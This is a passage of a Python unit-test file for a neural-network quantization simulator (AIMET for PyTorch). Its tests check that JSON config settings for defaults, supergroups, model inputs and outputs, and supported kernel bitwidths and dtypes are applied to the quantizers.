"is_symmetric": "True"
},
"supported_kernels": [
{
"activation": {
"bitwidth": 16,
"dtype": "int"
},
"param": {
"bitwidth": 16,
"dtype": "int"
}
}
]
},
"params": {
"weight": {
"is_quantized": "True",
"is_symmetric": "False"
}
},
"op_type": {
"Conv": {
"supported_kernels": [
{
"activation": {
"bitwidth": 16,
"dtype": "int"
},
"param": {
"bitwidth": 8,
"dtype": "int"
}
}
]
}
},
"supergroups": [],
"model_input": {},
"model_output": {}
}
expected_supported_kernels = [
{
"activation": {
"bitwidth": 16,
"dtype": QuantizationDataType.int
},
"param": {
"bitwidth": 8,
"dtype": QuantizationDataType.int
}
}
]
with open('./data/quantsim_config.json', 'w') as f:
json.dump(quantsim_config, f)
sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced,
config_file='./data/quantsim_config.json',
dummy_input=torch.rand(1, 3, 32, 32))
supported_kernels_in_defaults = sim._supported_kernels["Conv"]
assert len(supported_kernels_in_defaults) == 1
assert supported_kernels_in_defaults == expected_supported_kernels
def test_parse_config_file_supergroups(self):
    """ Test that supergroup quantization parameters are set correctly when using json config file """
    model = QuantSimTinyModel()
    model.eval()
    # Four supergroups are declared; quantizers between fused ops should end up disabled
    quantsim_config = {
        "defaults": {
            "ops": {
                "is_output_quantized": "True",
                "is_symmetric": "False"
            },
            "params": {
                "is_quantized": "False",
                "is_symmetric": "False"
            }
        },
        "params": {},
        "op_type": {},
        "supergroups": [
            {
                "op_list": ["Conv", "BatchNormalization"]
            },
            {
                "op_list": ["Relu", "MaxPool"]
            },
            {
                "op_list": ["Conv", "Relu", "AveragePool"]
            },
            {
                "op_list": ["Conv", "Clip"]
            },
        ],
        "model_input": {},
        "model_output": {}
    }
    with open('./data/quantsim_config.json', 'w') as f:
        json.dump(quantsim_config, f)
    # Use in_place=True here for easy access to modules through model instance variables
    sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced,
                               config_file='./data/quantsim_config.json',
                               in_place=True, dummy_input=torch.rand(1, 3, 32, 32))
    for _, module in sim.model.named_modules():
        if isinstance(module, QcQuantizeWrapper):
            # Check configs for starts of supergroups:
            # their output feeds the next fused op, so it is not quantized
            if module in [model.conv1, model.relu1, model.conv2, model.conv3]:
                assert not module.output_quantizers[0].enabled
            # Check configs for middle ops in supergroups: both sides disabled
            elif module == model.relu3:
                assert not module.input_quantizer.enabled
                assert not module.output_quantizers[0].enabled
            # Check configs for ends of supergroups: only the output is quantized
            elif module in [model.bn1, model.maxpool, model.bn2, model.avgpool, model.relu2]:
                assert not module.input_quantizer.enabled
                assert module.output_quantizers[0].enabled
            else:
                # Ops outside any supergroup follow the defaults (output quantized only)
                assert not module.input_quantizer.enabled
                assert module.output_quantizers[0].enabled
    if os.path.exists('./data/quantsim_config.json'):
        os.remove('./data/quantsim_config.json')
def test_parse_config_file_elementwise_ops(self):
    """ Test that elementwise op quantizers are set as expected """
    model = SingleResidual()
    model.eval()
    # Only the Add op type asks for quantized inputs; everything else stays untouched
    quantsim_config = {
        "defaults": {
            "ops": {},
            "params": {}
        },
        "params": {},
        "op_type": {
            "Add": {
                "is_input_quantized": "True"
            }
        },
        "supergroups": [],
        "model_input": {},
        "model_output": {}
    }
    with open('./data/quantsim_config.json', 'w') as config_fp:
        json.dump(quantsim_config, config_fp)
    sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced,
                               config_file='./data/quantsim_config.json',
                               dummy_input=torch.rand(1, 3, 32, 32))
    wrapped_modules = [(name, m) for name, m in sim.model.named_modules()
                       if isinstance(m, QcQuantizeWrapper)]
    for name, module in wrapped_modules:
        # conv3 and ada feed the functional add, so their output quantizers stand in
        # for add's input quantization; all other quantizers stay disabled
        producer_of_add = name in ('conv3', 'ada')
        assert bool(module.output_quantizers[0].enabled) == producer_of_add
        assert not module.input_quantizer.enabled
    if os.path.exists('./data/quantsim_config.json'):
        os.remove('./data/quantsim_config.json')
def test_parse_config_file_model_inputs(self):
    """ Test that model input quantization parameters are set correctly when using json config file """
    model = MultiInput()
    model.eval()
    # Only the model_input section is populated: every model input should be quantized
    quantsim_config = {
        "defaults": {
            "ops": {},
            "params": {}
        },
        "params": {},
        "op_type": {},
        "supergroups": [],
        "model_input": {
            "is_input_quantized": "True"
        },
        "model_output": {}
    }
    with open('./data/quantsim_config.json', 'w') as f:
        json.dump(quantsim_config, f)
    sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced, config_file='./data/quantsim_config.json',
                               dummy_input=(torch.rand(1, 3, 32, 32), torch.rand(1, 3, 20, 20)), in_place=True)
    for name, module in sim.model.named_modules():
        if isinstance(module, QcQuantizeWrapper):
            # conv1 and conv3 consume the model inputs, so only their input quantizers are enabled
            # (the original comment here referred to the add op and was copy-pasted from another test)
            if name in ('conv1', 'conv3'):
                assert module.input_quantizer.enabled
            else:
                assert not module.input_quantizer.enabled
            # Nothing else is quantized or symmetric with an otherwise-empty config
            assert not module.output_quantizers[0].enabled
            assert not module.input_quantizer.use_symmetric_encodings
            assert not module.output_quantizers[0].use_symmetric_encodings
    if os.path.exists('./data/quantsim_config.json'):
        os.remove('./data/quantsim_config.json')
def test_parse_config_file_model_outputs(self):
    """ Test that model output quantization parameters are set correctly when using json config file """
    model = SingleResidual()
    model.eval()
    # Only the model_output section is populated: the final op's output should be quantized
    quantsim_config = {
        "defaults": {
            "ops": {},
            "params": {}
        },
        "params": {},
        "op_type": {},
        "supergroups": [],
        "model_input": {},
        "model_output": {
            "is_output_quantized": "True"
        }
    }
    with open('./data/quantsim_config.json', 'w') as f:
        json.dump(quantsim_config, f)
    sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced, config_file='./data/quantsim_config.json',
                               dummy_input=torch.rand(1, 3, 32, 32))
    for name, module in sim.model.named_modules():
        if isinstance(module, QcQuantizeWrapper):
            if name == 'fc':
                # fc produces the model output, so only its output quantizer is enabled
                # (the original comment about conv3/ada was copy-pasted from another test)
                assert module.output_quantizers[0].enabled
            else:
                assert not module.output_quantizers[0].enabled
            assert not module.input_quantizer.enabled
    if os.path.exists('./data/quantsim_config.json'):
        os.remove('./data/quantsim_config.json')
def test_supergroups_with_functional_add(self):
    """ Test supergroup with functional add """
    model = SingleResidual()
    model.eval()
    # Declare a single supergroup that fuses Add followed by Relu
    quantsim_config = {
        "defaults": {
            "ops": {
                "is_output_quantized": "True"
            },
            "params": {}
        },
        "params": {},
        "op_type": {},
        "supergroups": [
            {
                "op_list": ["Add", "Relu"]
            }
        ],
        "model_input": {},
        "model_output": {}
    }
    with open('./data/quantsim_config.json', 'w') as config_fp:
        json.dump(quantsim_config, config_fp)
    # Use in_place=True here for easy access to modules through model instance variables
    sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced,
                               config_file='./data/quantsim_config.json',
                               in_place=True, dummy_input=torch.rand(1, 3, 32, 32))
    wrappers = (m for _, m in sim.model.named_modules() if isinstance(m, QcQuantizeWrapper))
    for module in wrappers:
        if module == model.relu3:
            # relu3 follows the functional add inside the supergroup; had add not been
            # part of the supergroup, relu3's input quantizer would be enabled
            assert not module.input_quantizer.enabled
    if os.path.exists('./data/quantsim_config.json'):
        os.remove('./data/quantsim_config.json')
def test_supergroups_with_module_add(self):
    """ Test supergroup with add module """
    model = SingleResidualWithModuleAdd()
    model.eval()
    quantsim_config = {
        "defaults": {
            "ops": {
                "is_output_quantized": "True"
            },
            "params": {}
        },
        "params": {},
        "op_type": {},
        "supergroups": [
            {
                "op_list": ["Add", "Relu"]
            }
        ],
        "model_input": {},
        "model_output": {}
    }
    with open('./data/quantsim_config.json', 'w') as f:
        json.dump(quantsim_config, f)
    # Use in_place=True here for easy access to modules through model instance variables
    sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced,
                               config_file='./data/quantsim_config.json',
                               in_place=True, dummy_input=torch.rand(1, 3, 32, 32))
    for _, module in sim.model.named_modules():
        if isinstance(module, QcQuantizeWrapper):
            # add starts the supergroup, so its output quantizer is disabled
            # (the original comments here referred to relu's input quantizer)
            if module == model.add:
                # Had add not been part of the supergroup, its output quantizer would be enabled
                assert not module.output_quantizer.enabled
            else:
                # Every other op follows the defaults: output quantized, input not
                assert module.output_quantizer.enabled
                assert not module.input_quantizer.enabled
    if os.path.exists('./data/quantsim_config.json'):
        os.remove('./data/quantsim_config.json')
def test_parse_config_file_symmetric_modes(self):
    """ Test that strict_symmetric / unsigned_symmetric defaults propagate to every quantizer """
    model = SingleResidual()
    model.eval()
    quantsim_config = {
        "defaults": {
            "ops": {},
            "params": {},
            "strict_symmetric": "True",
            "unsigned_symmetric": "False"
        },
        "params": {},
        "op_type": {},
        "supergroups": [],
        "model_input": {},
        "model_output": {
        }
    }
    with open('./data/quantsim_config.json', 'w') as config_fp:
        json.dump(quantsim_config, config_fp)
    sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced,
                               config_file='./data/quantsim_config.json',
                               dummy_input=torch.rand(1, 3, 32, 32))
    for _, module in sim.model.named_modules():
        if not isinstance(module, QcQuantizeWrapper):
            continue
        # Input, output, and param quantizers must all honor the symmetric-mode flags
        every_quantizer = list(module.input_quantizers) \
                          + list(module.output_quantizers) \
                          + list(module.param_quantizers.values())
        for quantizer in every_quantizer:
            assert quantizer.use_strict_symmetric
            assert not quantizer.use_unsigned_symmetric
    if os.path.exists('./data/quantsim_config.json'):
        os.remove('./data/quantsim_config.json')
def test_get_all_ops_in_neighborhood(self):
    """ Test that get_all_ops_in_neighborhood returns an op together with its output-side neighbors
    (the original docstring was copy-pasted from a config-file test) """
    model = SingleResidual()
    model.eval()
    input_shapes = (1, 3, 32, 32)
    random_inputs = utils.create_rand_tensors_given_shapes(input_shapes)
    conn_graph = ConnectedGraph(model, random_inputs)
    starting_op = conn_graph.get_all_ops()['Conv_7']
    add_10_op = conn_graph.get_all_ops()['Add_10']
    # Walking in the 'output' direction from Conv_7 should reach Add_10 and nothing else
    neighborhood = get_all_ops_in_neighborhood(starting_op, 'output')
    assert len(neighborhood) == 2
    assert starting_op in neighborhood
    assert add_10_op in neighborhood
@pytest.mark.cuda
def test_parse_config_file_defaults_gpu(self):
    """ Test that default quantization parameters are set correctly when using json config file """
    model = SingleResidual()
    model.eval()
    model.cuda()
    quantsim_config = {
        "defaults": {
            "ops": {
                "is_output_quantized": "True",
                "is_symmetric": "False"
            },
            "params": {
                "is_quantized": "False",
                "is_symmetric": "True"
            }
        },
        "params": {},
        "op_type": {},
        "supergroups": [],
        "model_input": {},
        "model_output": {}
    }
    with open('./data/quantsim_config.json', 'w') as f:
        json.dump(quantsim_config, f)
    sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced, config_file='./data/quantsim_config.json',
                               dummy_input=torch.rand(1, 3, 32, 32).cuda(), in_place=True)
    for name, module in sim.model.named_modules():
        if isinstance(module, QcQuantizeWrapper):
            # Output of add op is input quantized: relu3 follows the functional add,
            # so its input quantizer stands in for add's output quantization
            if name == 'relu3':
                assert module.input_quantizer.enabled
            else:
                assert not module.input_quantizer.enabled
            # Defaults: outputs quantized asymmetric, params unquantized symmetric
            assert module.output_quantizers[0].enabled
            assert not module.input_quantizer.use_symmetric_encodings
            assert not module.output_quantizers[0].use_symmetric_encodings
            if module.param_quantizers:
                for _, param_quantizer in module.param_quantizers.items():
                    assert not param_quantizer.enabled
                    assert param_quantizer.use_symmetric_encodings
    if os.path.exists('./data/quantsim_config.json'):
        os.remove('./data/quantsim_config.json')
def test_gelu_layernorm_quantsim_config(self):
    """
    Create a network with LayerNorm and GELU
    Override quantization config and check config is applied
    This is a validation for actual entry in the map_torch_types_to_onnx in onnx_utils
    This is used by connected graph to apply op level specific quantsim config.
    :return:
    """
    import json
    from aimet_common.defs import QuantScheme
    from aimet_torch.quantsim import QuantizationSimModel
    import libpymo

    class ModelWithGeluLayerNorm(torch.nn.Module):
        def __init__(self):
            super(ModelWithGeluLayerNorm, self).__init__()
            self.linear1 = torch.nn.Linear(4, 4)
            # default attribute -
            # eps = 1e-05 and elementwise_affine = True
            # parameters : weight and bias
            self.ln1 = torch.nn.LayerNorm(4)
            self.gelu1 = torch.nn.GELU()

        def forward(self, x):
            x = self.linear1(x)
            x = self.ln1(x)
            x = self.gelu1(x)
            return x

    # create custom config to override LayerNorm and GELU
    quantsim_config = {
        "defaults": {
            "ops": {
                "is_output_quantized": "True",
                "is_symmetric": "False"
            },
            "params": {
                "is_quantized": "False",
                "is_symmetric": "True"
            }
        },
        "params": {},
        "op_type": {
            "LayerNorm": {
                "is_input_quantized": "True",
                "params": {
                    "bias": {
                        "is_quantized": "True"
                    }
                }
            },
            "GELU": {
                "is_input_quantized": "True"
            }
        },
        "supergroups": [],
        "model_input": {},
        "model_output": {}
    }
    with open('./data/quantsim_config.json', 'w') as f:
        json.dump(quantsim_config, f)
    model = ModelWithGeluLayerNorm()
    model.eval()
    random_input = torch.rand(1, 4, 4)

    def forward_pass(model, args):
        model.eval()
        with torch.no_grad():
            # Bug fix: pass the tensor directly; 'model(*random_input)' unpacked the
            # batch dimension and fed a (4, 4) tensor instead of the (1, 4, 4) shape
            # used as dummy_input for the sim
            model(random_input)

    # QuantSim for model
    sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf,
                               config_file='./data/quantsim_config.json',
                               dummy_input=random_input)
    sim.compute_encodings(forward_pass, None)
    # check quantizer added to parameters of LayerNorm
    from aimet_torch.qc_quantize_op import StaticGridPerTensorQuantizer
    assert(isinstance(sim.model.ln1.param_quantizers['weight'], StaticGridPerTensorQuantizer))
    assert(isinstance(sim.model.ln1.param_quantizers['bias'], StaticGridPerTensorQuantizer))
    # LayerNorm input quantization is disabled by default
    # override with custom config file, this needs appropriate entry in onnx node name mapping
    assert(isinstance(sim.model.ln1.input_quantizer, StaticGridPerTensorQuantizer))
    assert(sim.model.ln1.input_quantizer.encoding)
    in_quantizer = sim.model.ln1.input_quantizer
    assert(in_quantizer.enabled)  # disabled by default, override with config file
    assert(in_quantizer.round_mode == libpymo.RoundingMode.ROUND_NEAREST)
    assert(in_quantizer.quant_scheme == QuantScheme.post_training_tf)
    assert(in_quantizer.bitwidth == 8)
    # GELU input quantization is disabled by default
    # override with custom config file, this needs appropriate entry in onnx node name mapping
    assert(isinstance(sim.model.gelu1.input_quantizer, StaticGridPerTensorQuantizer))
    assert(sim.model.gelu1.input_quantizer.encoding)
    in_quantizer = sim.model.gelu1.input_quantizer
    assert(in_quantizer.enabled)  # disabled by default, override with config file
    assert(in_quantizer.round_mode == libpymo.RoundingMode.ROUND_NEAREST)
    assert(in_quantizer.quant_scheme == QuantScheme.post_training_tf)
    assert(in_quantizer.bitwidth == 8)
    # remove test config created
    if os.path.exists('./data/quantsim_config.json'):
        os.remove('./data/quantsim_config.json')
def test_default_quantsim_config_not_in_default_config_file_enforce_false(self):
    """
    Tests application of override config rule for default bitwidth and dtype for params and act.
    In this test, default supported kernel list (fp 16) in the config file DOES NOT SUPPORT
    default quantsim config (int 8), but ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG is set to False
    (the original docstring wrongly said True), so the quantsim defaults (int 8) are retained.
    Tests application of default config rule for op level bitwidth and dtype for params
    :return:
    """
    qsim_config.ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG = False
    model = SingleResidual()
    model.eval()
    quantsim_config = {
        "defaults": {
            "ops": {
                "is_output_quantized": "True"
            },
            "params": {
                "is_quantized": "True"
            },
            "supported_kernels": [
                {
                    "activation": {
                        "bitwidth": 16,
                        "dtype": "float"
                    },
                    "param": {
                        "bitwidth": 16,
                        "dtype": "float"
                    }
                }
            ]
        },
        "params": {
            "bias": {
                "is_quantized": "False"
            }
        },
        "op_type": {
            "Conv": {
                "is_input_quantized": "True",
                "is_output_quantized": "True",
                "params": {
                    "weight": {
                        "is_quantized": "True"
                    },
                    "bias": {
                        "is_quantized": "False"
                    }
                }
            }
        },
        "supergroups": [
        ],
        "model_input": {
            "is_input_quantized": "True"
        },
        "model_output": {}
    }
    with open('./data/quantsim_config.json', 'w') as f:
        json.dump(quantsim_config, f)
    INPUT_SHAPE = (1, 3, 32, 32)
    def forward_fn(model, _):
        torch.manual_seed(10)
        model.eval()
        with torch.no_grad():
            _ = model(torch.randn(INPUT_SHAPE))
    sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced,
                               config_file='./data/quantsim_config.json',
                               dummy_input=torch.rand(1, 3, 32, 32), in_place=True,
                               default_param_bw=8, default_output_bw=8, default_data_type=QuantizationDataType.int)
    sim.compute_encodings(forward_fn, forward_pass_callback_args=None)
    # all quantizers should be quantsim default quantsim dtype and bw (int 8)
    assert(sim.model.conv1.param_quantizers['weight'].enabled == True)
    assert(sim.model.conv1.param_quantizers['weight'].bitwidth == 8)
    assert(sim.model.conv1.param_quantizers['weight'].data_type == QuantizationDataType.int)
    assert(sim.model.conv1.output_quantizers[0].bitwidth == 8)
    assert(sim.model.conv1.output_quantizers[0].data_type == QuantizationDataType.int)
    # all quantizers should be quantsim default quantsim dtype and bw (int 8)
    # that is QUANTSIM DEFAULT bw / dtype (int 8).
    assert(sim.model.fc.param_quantizers['weight'].enabled)
    assert(sim.model.fc.param_quantizers['bias'].enabled == False)
    assert(sim.model.fc.param_quantizers['weight'].bitwidth == 8)
    assert(sim.model.fc.param_quantizers['weight'].data_type == QuantizationDataType.int)
    assert(sim.model.fc.param_quantizers['bias'].bitwidth == 8)
    assert(sim.model.fc.param_quantizers['bias'].data_type == QuantizationDataType.int)
    assert(sim.model.fc.output_quantizers[0].bitwidth == 8)
    assert(sim.model.fc.output_quantizers[0].data_type == QuantizationDataType.int)
    assert(sim.model.relu1.output_quantizers[0].bitwidth == 8)
    assert(sim.model.relu1.output_quantizers[0].data_type == QuantizationDataType.int)
    # reset the global flag and remove test config created
    qsim_config.ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG = False
    if os.path.exists('./data/quantsim_config.json'):
        os.remove('./data/quantsim_config.json')
def test_default_quantsim_config_in_default_config_file_enforce_true(self):
    """
    Tests application of override config rule for default bitwidth and dtype for params and act.
    In this test, default supported kernel list (int 8, fp 16) in the config file CONTAINS
    default quantsim config (int 8) + ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG is also set to True.
    Tests application of default config rule for op level bitwidth and dtype for params
    :return:
    """
    qsim_config.ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG = True
    model = SingleResidual()
    model.eval()
    quantsim_config = {
        "defaults": {
            "ops": {
                "is_output_quantized": "True"
            },
            "params": {
                "is_quantized": "True"
            },
            "supported_kernels": [
                {
                    "activation": {
                        "bitwidth": 16,
                        "dtype": "float"
                    },
                    "param": {
                        "bitwidth": 16,
                        "dtype": "float"
                    }
                },
                {
                    "activation": {
                        "bitwidth": 8,
                        "dtype": "int"
                    },
                    "param": {
                        "bitwidth": 8,
                        "dtype": "int"
                    }
                }
            ]
        },
        "params": {
            "bias": {
                "is_quantized": "False"
            }
        },
        "op_type": {
            "Conv": {
                "supported_kernels":
                [
                    {
                        "activation": {
                            "bitwidth": 16,
                            "dtype": "float"
                        },
                        "param": {
                            "bitwidth": 16,
                            "dtype": "float"
                        }
                    },
                    {
                        "activation": {
                            "bitwidth": 8,
                            "dtype": "int"
                        },
                        "param": {
                            "bitwidth": 16,
                            "dtype": "int"
                        }
                    },
                ],
                "is_input_quantized": "True",
                "is_output_quantized": "True",
                "params": {
                    "weight": {
                        "is_quantized": "True"
                    },
                    "bias": {
                        "is_quantized": "False"
                    }
                }
            }
        },
        "supergroups": [
        ],
        "model_input": {
            "is_input_quantized": "True"
        },
        "model_output": {}
    }
    with open('./data/quantsim_config.json', 'w') as f:
        json.dump(quantsim_config, f)
    INPUT_SHAPE = (1, 3, 32, 32)
    def forward_fn(model, _):
        torch.manual_seed(10)
        model.eval()
        with torch.no_grad():
            _ = model(torch.randn(INPUT_SHAPE))
    sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced,
                               config_file='./data/quantsim_config.json',
                               dummy_input=torch.rand(1, 3, 32, 32), in_place=True,
                               default_data_type=QuantizationDataType.int, default_output_bw=8, default_param_bw=8)
    sim.compute_encodings(forward_fn, forward_pass_callback_args=None)
    # enforce is true; the default quantsim bw / dtype (int 8) does not match the config file
    # supported kernels override at index 0 (fp 16), so override 0 is applied
    # (the original comment wrongly called the quantsim default "fp16")
    # apply override 0 # activation : bw = 16, float # param : bw = 16, float
    assert(sim.model.conv1.param_quantizers['weight'].enabled == True)
    assert(sim.model.conv1.param_quantizers['weight'].bitwidth == 16)
    assert(sim.model.conv1.param_quantizers['weight'].data_type == QuantizationDataType.float)
    assert(sim.model.conv1.output_quantizers[0].bitwidth == 16)
    assert(sim.model.conv1.output_quantizers[0].data_type == QuantizationDataType.float)
    assert(sim.model.fc.param_quantizers['weight'].enabled)
    assert(sim.model.fc.param_quantizers['bias'].enabled == False)
    assert(sim.model.fc.param_quantizers['weight'].bitwidth == 16)
    assert(sim.model.fc.param_quantizers['weight'].data_type == QuantizationDataType.float)
    assert(sim.model.fc.param_quantizers['bias'].bitwidth == 16)
    assert(sim.model.fc.param_quantizers['bias'].data_type == QuantizationDataType.float)
    assert(sim.model.fc.output_quantizers[0].bitwidth == 16)
    assert(sim.model.fc.output_quantizers[0].data_type == QuantizationDataType.float)
    assert(sim.model.relu1.output_quantizers[0].bitwidth == 16)
    assert(sim.model.relu1.output_quantizers[0].data_type == QuantizationDataType.float)
    # reset the global flag and remove test config created
    qsim_config.ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG = False
    if os.path.exists('./data/quantsim_config.json'):
        os.remove('./data/quantsim_config.json')
def test_default_quantsim_config_not_in_default_config_file_enforce_true(self):
    """
    Tests application of override config rule for default bitwidth and dtype for params and act.
    In this test, default supported kernel list (fp 16) in the config file DOES NOT SUPPORT
    default quantsim config (int 8) + ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG is also set to True.
    Tests application of default config rule for op level bitwidth and dtype for params
    :return:
    """
    qsim_config.ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG = True
    model = SingleResidual()
    model.eval()
    quantsim_config = {
        "defaults": {
            "ops": {
                "is_output_quantized": "True"
            },
            "params": {
                "is_quantized": "True"
            },
            "supported_kernels": [
                {
                    "activation": {
                        "bitwidth": 16,
                        "dtype": "float"
                    },
                    "param": {
                        "bitwidth": 16,
                        "dtype": "float"
                    }
                },
                {
                    "activation": {
                        "bitwidth": 16,
                        "dtype": "int"
                    },
                    "param": {
                        "bitwidth": 16,
                        "dtype": "int"
                    }
                }
            ]
        },
        "params": {
            "bias": {
                "is_quantized": "False"
            }
        },
        "op_type": {
            "Conv": {
                "is_input_quantized": "True",
                "is_output_quantized": "True",
                "params": {
                    "weight": {
                        "is_quantized": "True"
                    },
                    "bias": {
                        "is_quantized": "False"
                    }
                }
            }
        },
        "supergroups": [
        ],
        "model_input": {
            "is_input_quantized": "True"
        },
        "model_output": {}
    }
    with open('./data/quantsim_config.json', 'w') as f:
        json.dump(quantsim_config, f)
    INPUT_SHAPE = (1, 3, 32, 32)
    def forward_fn(model, _):
        torch.manual_seed(10)
        model.eval()
        with torch.no_grad():
            _ = model(torch.randn(INPUT_SHAPE))
    sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced,
                               config_file='./data/quantsim_config.json',
                               dummy_input=torch.rand(1, 3, 32, 32), in_place=True,
                               default_data_type=QuantizationDataType.int, default_output_bw=8, default_param_bw=8)
    sim.compute_encodings(forward_fn, forward_pass_callback_args=None)
    # enforce is true, however default quantsim bw / dtype (int 8) is NOT IN the config file supported kernels
    # should be configured with config file default supported kernel [0]
    # activation : bw = 16 , float
    # param : bw = 16, float
    assert(sim.model.conv1.param_quantizers['weight'].enabled == True)
    assert(sim.model.conv1.param_quantizers['weight'].bitwidth == 16)
    assert(sim.model.conv1.param_quantizers['weight'].data_type == QuantizationDataType.float)
    assert(sim.model.conv1.output_quantizers[0].bitwidth == 16)
    assert(sim.model.conv1.output_quantizers[0].data_type == QuantizationDataType.float)
    assert(sim.model.fc.param_quantizers['weight'].enabled)
    assert(sim.model.fc.param_quantizers['bias'].enabled == False)
    assert(sim.model.fc.param_quantizers['weight'].bitwidth == 16)
    assert(sim.model.fc.param_quantizers['weight'].data_type == QuantizationDataType.float)
    assert(sim.model.fc.param_quantizers['bias'].bitwidth == 16)
    assert(sim.model.fc.param_quantizers['bias'].data_type == QuantizationDataType.float)
    assert(sim.model.fc.output_quantizers[0].bitwidth == 16)
    assert(sim.model.fc.output_quantizers[0].data_type == QuantizationDataType.float)
    assert(sim.model.relu1.output_quantizers[0].bitwidth == 16)
    assert(sim.model.relu1.output_quantizers[0].data_type == QuantizationDataType.float)
    # reset the global flag and remove test config created
    qsim_config.ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG = False
    if os.path.exists('./data/quantsim_config.json'):
        os.remove('./data/quantsim_config.json')
def test_check_correctness_of_dtype_bw_rules_valid_case(self):
    """
    Test to check api check_correctness_of_dtype_bw_rules, valid config case
    :return:
    """
    model = SingleResidual()
    model.eval()
    quantsim_config = {
        "defaults": {
            "ops": {
                "is_output_quantized": "True"
            },
            "params": {
                "is_quantized": "True"
            },
            "supported_kernels": [
                {
                    "activation": {
                        "bitwidth": 16,
                        "dtype": "int"
                    },
                    "param": {
                        "bitwidth": 16,
                        "dtype": "int"
                    }
                },
                {
                    "activation": {
                        "bitwidth": 8,
                        "dtype": "int"
                    },
                    "param": {
                        "bitwidth": 16,
                        "dtype": "int"
                    }
                }
            ]
        },
        "params": {
            "bias": {
                "is_quantized": "False"
            }
        },
        "op_type": {
            "Conv": {
                "supported_kernels":
                [
                    {
                        "activation": {
                            "bitwidth": 16,
                            "dtype": "float"
                        },
                        "param": {
                            "bitwidth": 16,
                            "dtype": "float"
                        }
                    },
                ],
                "is_input_quantized": "True",
                "is_output_quantized": "True",
                "params": {
                    "weight": {
                        "is_quantized": "True"
                    },
                    "bias": {
                        "is_quantized": "False"
                    }
                }
            }
        },
        "supergroups": [
        ],
        "model_input": {
            "is_input_quantized": "True"
        },
        "model_output": {}
    }
    config_file = './data/quantsim_config.json'
    with open(config_file, 'w') as f:
        json.dump(quantsim_config, f)
    INPUT_SHAPE = (1, 3, 32, 32)
    # NOTE: the previously-defined 'forward_fn' helper was never used and has been removed
    supported_kernels = {}
    from aimet_torch.quantsim_config.quantsim_config import QuantSimConfigurator
    dummy_input = torch.randn(INPUT_SHAPE)
    connected_graph = ConnectedGraph(model, dummy_input)
    # Named 'configurator' (was 'qsim_config') to avoid shadowing the module-level
    # qsim_config import used elsewhere for ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG
    configurator = QuantSimConfigurator(model, connected_graph, config_file, supported_kernels,
                                        quantsim_output_bw=8, quantsim_param_bw=8,
                                        quantsim_data_type=QuantizationDataType.int)
    qsim_dtype_bw = QuantDtypeBwInfo(data_type=QuantizationDataType.int, act_bw=8, param_bw=8)
    # quantsim defaults (int 8 act / 8 param) are consistent with the config's kernels -> valid
    assert configurator.check_correctness_of_dtype_bw_rules(qsim_dtype_bw)
    # remove test config created
    if os.path.exists(config_file):
        os.remove(config_file)
def test_check_correctness_of_dtype_bw_rules_default_supported_kernels_exception_case(self):
    """
    Test to check api check_correctness_of_dtype_bw_rules, invalid default supported_kernels case
    :return:
    """
    model = SingleResidual()
    model.eval()
    # First default kernel (act bw 4) conflicts with the others (act bw 8): invalid config
    quantsim_config = {
        "defaults": {
            "ops": {
                "is_output_quantized": "True"
            },
            "params": {
                "is_quantized": "True"
            },
            "supported_kernels": [
                {
                    "activation": {
                        "bitwidth": 4,
                        "dtype": "int"
                    },
                    "param": {
                        "bitwidth": 16,
                        "dtype": "int"
                    }
                },
                {
                    "activation": {
                        "bitwidth": 8,
                        "dtype": "int"
                    },
                    "param": {
                        "bitwidth": 16,
                        "dtype": "int"
                    }
                }
            ]
        },
        "params": {
            "bias": {
                "is_quantized": "False"
            }
        },
        "op_type": {
            "Conv": {
                "supported_kernels":
                [
                    {
                        "activation": {
                            "bitwidth": 16,
                            "dtype": "float"
                        },
                        "param": {
                            "bitwidth": 16,
                            "dtype": "float"
                        }
                    },
                ],
                "is_input_quantized": "True",
                "is_output_quantized": "True",
                "params": {
                    "weight": {
                        "is_quantized": "True"
                    },
                    "bias": {
                        "is_quantized": "False"
                    }
                }
            }
        },
        "supergroups": [
        ],
        "model_input": {
            "is_input_quantized": "True"
        },
        "model_output": {}
    }
    config_file = './data/quantsim_config.json'
    with open(config_file, 'w') as f:
        json.dump(quantsim_config, f)
    INPUT_SHAPE = (1, 3, 32, 32)
    supported_kernels = {}
    from aimet_torch.quantsim_config.quantsim_config import QuantSimConfigurator
    dummy_input = torch.randn(INPUT_SHAPE)
    connected_graph = ConnectedGraph(model, dummy_input)
    # NOTE(review): this local 'qsim_config' shadows the module-level qsim_config import
    # used elsewhere for ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG — confusing but harmless here
    qsim_config = QuantSimConfigurator(model, connected_graph, config_file, supported_kernels,
                                       quantsim_output_bw=8, quantsim_param_bw=8,
                                       quantsim_data_type=QuantizationDataType.int)
    qsim_dtype_bw = QuantDtypeBwInfo(data_type=QuantizationDataType.int, act_bw=8 , param_bw=8)
    # The invalid default supported_kernels list must make the check raise NotImplementedError
    exception_raised = False
    try:
        qsim_config.check_correctness_of_dtype_bw_rules(qsim_dtype_bw)
    except NotImplementedError as exc:
        print(" Test raised exception as expected ", exc)
        exception_raised = True
    assert exception_raised
    # remove test config created
    if os.path.exists('./data/quantsim_config.json'):
